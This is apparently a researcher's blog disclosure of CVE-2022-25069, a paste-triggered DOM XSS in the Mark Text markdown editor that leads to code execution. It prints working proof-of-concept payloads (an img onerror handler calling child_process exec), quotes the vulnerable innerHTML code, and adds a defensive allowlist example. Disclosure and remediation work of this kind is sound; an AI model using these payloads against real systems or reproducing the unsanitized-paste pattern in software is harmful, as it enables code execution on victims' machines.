
CVE-2022-25069: Mark text : Remote code execution through pasting content

by luiseok 2022. 3. 15.

About

Mark Text (https://marktext.app/) is a markdown editor built with electron.js and vue.js v2.6.14. I've discovered that it contains a DOM-based cross-site scripting (XSS) vulnerability that allows attackers to perform remote code execution when a crafted payload is pasted from the clipboard.

Details

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The HTML above is inserted into Mark Text as DOM by the source code below (the `tmp.innerHTML = text` assignment), and remote code execution follows when the inline `onerror` handler calls child_process.

 ContentState.prototype.checkCopyType = function (html, text) { 
   let type = 'normal' 
   if (!html && text) { 
     type = 'copyAsMarkdown' 
     const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim()) 
     if (match && match[1]) { 
       const tag = match[1] 
       if (tag === 'table' && match.length === 3 && match[2] === 'table') { 
         // Try to import a single table 
         const tmp = document.createElement('table') 
         tmp.innerHTML = text 
         if (tmp.childElementCount === 1) { 
           return 'htmlToMd' 
         } 
       } 
  
       // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX. 
       type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type 
     } 
   } 
   return type 
 }

 

 


As the code shows, the only check is a regular expression that tests whether the pasted text is HTML and whether it is a <table> element.

That was the weak point. The text should have been checked or sanitized before being pasted, but it was not.

As a result, the attacker was able to take full control of the victim's computer.

Example

[Screenshot: pasting the crafted payload into the Mark Text Linux application]
[Screenshot: pasting the crafted payload into the Mark Text Windows application]

Solution

This issue should be fixed by sanitizing the child elements of the pasted markup before it is inserted into the DOM.
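One way to gate the table-import path, shown as an added example that is neither Mark Text's code nor the change made in the project's fix: the regular expression is copied from `checkCopyType` above, while `looksLikeTable`, `isInertTableMarkup`, `ALLOWED_TAGS` and the sample inputs are hypothetical names and constructed data. The gate rejects rather than repairs, so anything it refuses is never assigned to `innerHTML`.

```javascript
// Added example: not Mark Text's code and not the project's fix.
// The regex below is copied from checkCopyType on this page.
const PAGE_REGEX = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/

// What the page's check concludes: "this text is <table> ... </table>".
function looksLikeTable (text) {
  const match = PAGE_REGEX.exec(text.trim())
  return Boolean(match && match[1] === 'table' && match[2] === 'table')
}

// Hypothetical allowlist: table structure only, and no attributes at all.
const ALLOWED_TAGS = new Set(['table', 'thead', 'tbody', 'tfoot', 'tr', 'th', 'td'])
// One token = a run of text without "<", or a bare <tag> / </tag>.
const TOKEN = /[^<]+|<\/?([a-zA-Z][a-zA-Z\d-]*)\s*>/y

// Fail-closed gate (hypothetical helper): true only when every "<" in the
// text opens or closes an allowlisted, attribute-free tag. Other elements,
// attributes such as onerror, comments and stray "<" are all rejected, so the
// caller can skip the innerHTML import and treat the paste as plain text.
function isInertTableMarkup (text) {
  const input = text.trim()
  if (!looksLikeTable(input)) return false
  let pos = 0
  while (pos < input.length) {
    TOKEN.lastIndex = pos
    const m = TOKEN.exec(input)
    if (!m) return false // a "<" that is not a bare tag: reject
    if (m[1] && !ALLOWED_TAGS.has(m[1].toLowerCase())) return false
    pos = TOKEN.lastIndex
  }
  return true
}

// Constructed sample inputs (the handler bodies are harmless stand-ins).
const SAMPLES = {
  plainTable: '<table><tr><td>a</td><td>b</td></tr></table>',
  imgHandler: '<table><tr><img src onerror="console.log(1)"></tr></table>',
  attrOnCell: '<table><tr><td onclick="x()">a</td></tr></table>',
  comment: '<table><!-- x --><tr><td>a</td></tr></table>'
}

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, { regex: looksLikeTable(html), gate: isInertTableMarkup(html) })
}
```

All four samples pass the page's regular expression, but only `plainTable` passes the gate.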

Timeline

2022-02-08 Vulnerability found and the issue was filed on Mark Text's GitHub

2022-02-10 Problem fixed, CVE ID requested

2022-03-05 CVE ID issued (CVE-2022-25069)

References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-25069
  2. https://github.com/marktext/marktext/issues/2990
  3. https://github.com/marktext/marktext/pull/3002 

 

Footnote

This was my first experience finding an open source vulnerability and getting a CVE ID issued. It was really thrilling and I felt a great sense of accomplishment.
I would like to express my gratitude to Oscar for giving me as much courage as possible in this experience.